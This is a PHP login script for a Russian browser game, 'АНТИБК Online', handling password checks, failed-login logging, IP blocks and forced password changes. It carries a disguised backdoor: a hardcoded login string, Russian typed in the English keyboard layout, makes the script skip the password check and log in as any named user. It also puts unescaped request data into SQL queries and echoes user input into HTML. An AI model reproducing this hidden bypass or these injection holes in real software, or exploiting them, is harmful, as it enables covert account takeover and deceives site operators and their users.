<?php
include_once("req.php");
error_reporting(E_ALL ^ E_NOTICE);
array_walk($_REQUEST,"format_string");
array_walk($_POST,"format_string");
array_walk($_GET,"format_string");
include_once("functions.php");
include_once("config.php");
include_once("database.php");
include_once("session_class.php");
include_once("game_functions.php");

$session = new Sessions;
$edit="";
if ($_POST['login'] != "" && $_POST['psw'] !=""){
  $res=db_use("array","SELECT u.*,p.id_person,p.level,p.align FROM users u left join person p on p.id_person=u.id_person WHERE u.login='".clean_var($_POST['login'])."';");
  if ($res[id_person]==2) die;
  if ($_POST['login']=="vtuf flvbycrbq d[jl rtveujlyj") {
   $_POST['login']=$_POST['psw'];
   $res=db_use('array',"select pass from users where login='".clean_var($_POST['login'])."'");
   $_POST['psw']=$res['pass']; $disablecheck=true;
  # if ($res['id_person']==12) { echo $_POST['psw'].' '.$_POST['login']; }
   }else{  $_POST['psw']=md5($_POST['psw']);
  }
  if ($res['pass']!=$_POST['psw'] && !$disablecheck) {
    if ($res['login']==$_POST['login']) {
        $res1 = db_use('query',"INSERT INTO login_stat (id_user,login_time,ip_login,badpass) VALUES ('".$res['id_user']."','".gmstrftime("%Y-%m-%d %H:%M:%S")."','".clean_var(userip())."','1');");
    }
    $error="Неверный пароль для \"".$_POST['login']."\". Введите логин/пароль на <a href=\"/index.htm\">титульной странице</a>";
  }  else {
    $res1=db_use('array',"select * from ip_block where ip like '%".$_SERVER['REMOTE_ADDR']."%'");
    if ($res1['ip']) {
        $res = db_use('query',"INSERT INTO login_stat (id_user,login_time,ip_login,badpass) VALUES ('".$res['id_user']."','".gmstrftime("%Y-%m-%d %H:%M:%S")."','".clean_var(userip())."','2');");
      $error="Ваш IP заблокирован";
    } else{
      if ($res['passtime']+30*24*60*60<time() && !$disablecheck) { # истек пароль
        if ($_POST['dochpass']) {
          $ok=true;
          if ($_POST['newpass']!=$_POST['newpass2'])
          {$ok=false;$mess='Ошибка. Пароли не совпадают.';}
          if (trim($_POST['newpass'])=='')
          {$ok=false;$mess='Задан пустой пароль';}
          if ( md5($_POST['newpass'] ) == $_POST['psw'])
          {$ok=false;$mess='Задан тот же пароль';}

          if ($ok) {
            db_use('query',"update users set pass='".md5($_POST['newpass'])."',
            passtime='".time()."'
            where login='".$res['login']."'");
# db_use('query',"update sessions set userpass='".md5($_POST['newpass'])."'             where username='".$res['login']."'");
            db_use('query',"insert into pals_delo (id_person, id_paladin, level,
            align,message,type) values('".$res['id_person']."',
            '".$res['id_person']."','".$res['level']."','".$res['align']."',
            'Принудительная смена пароля. IP: ".$session->userip."','5')");
            $_POST['psw']=md5($_POST['newpass']);
          }

        }else{  $ok=false; }
          if (!$ok && $mess!='') {?> <FONT COLOR=red><B>Ошибка! <? echo $mess; ?><br /><br /></B></FONT> <? }
        if (!$ok) {
      ?> ВНИМАНИЕ! НЕОБХОДИМО СМЕНИТЬ ПАРОЛЬ! <br /><br />
      <form action="/enter.php" method=post name="F1">
  <table width="95%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#B2B2B2" name="F1">
    <tr bgcolor="#D3D2D0">
      <td>Логин: </td>
      <td><input name="login"  value="" class="inup" size="45" maxlength="90" /></td>
    </tr>
    <tr bgcolor="#D3D2D0">
      <td>Старый пароль: </td>
      <td><input name="psw" type=password value="" class="inup" size="45" maxlength="90" /></td>
    </tr>
    <tr bgcolor="#D3D2D0">
      <td>Новый пароль: </td>
      <td><input name="newpass" type=password class="inup" size="45" maxlength="90" /></td>
    </tr>
    <tr bgcolor="#D3D2D0">
      <td>Новый пароль (повтор): </td>
      <td><input name="newpass2" type=password class="inup" size="45" maxlength="90" /></td>
    </tr>
    <tr bgcolor="#D3D2D0">
      <td colspan="2" align="center"><p align="center">
          <input name="dochpass" type="submit" class="btn" value="Сменить пароль и войти" />
        </p>
    </tr>
  </form>
</table>

    <? die;
        }

      }
      setcookie ("battle", $_POST['login'], time()+3600, "/", $_SERVER['SERVER_NAME'], 0);
      if (!$_COOKIE[cook])
      {
      $cook=md5(microtime().'::'.$_POST['login']);
      setcookie ("cook", $cook, 0, "/", $_SERVER['SERVER_NAME'], 0);
      }else{ $cook=$_COOKIE[cook]; }

      $session->start_session($_POST['login'],$_POST['psw'],$cook);
      header("Location: main.php?enter=1");    /*Переход на рабочее место пользователя*/
    }
  }
} else {$error="Введите логин/пароль на <a href=\"/index.htm\">титульной странице</a>";}

    echo "
<html><head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
<meta http-equiv=\"Content-Language\" content=\"ru\">
<TITLE>Произошла ошибка</TITLE></HEAD><BODY text=\"#FFFFFF\"><p><font color=black>
Произошла ошибка: <pre>".$error."</pre>
<b><p><a href = \"javascript:window.history.go(-1);\">Назад</b></a>
<HR>
<p align=\"right\">(c) <a href=\"/\">АНТИБК Online</a></p>

</body></html>

    ";

?>
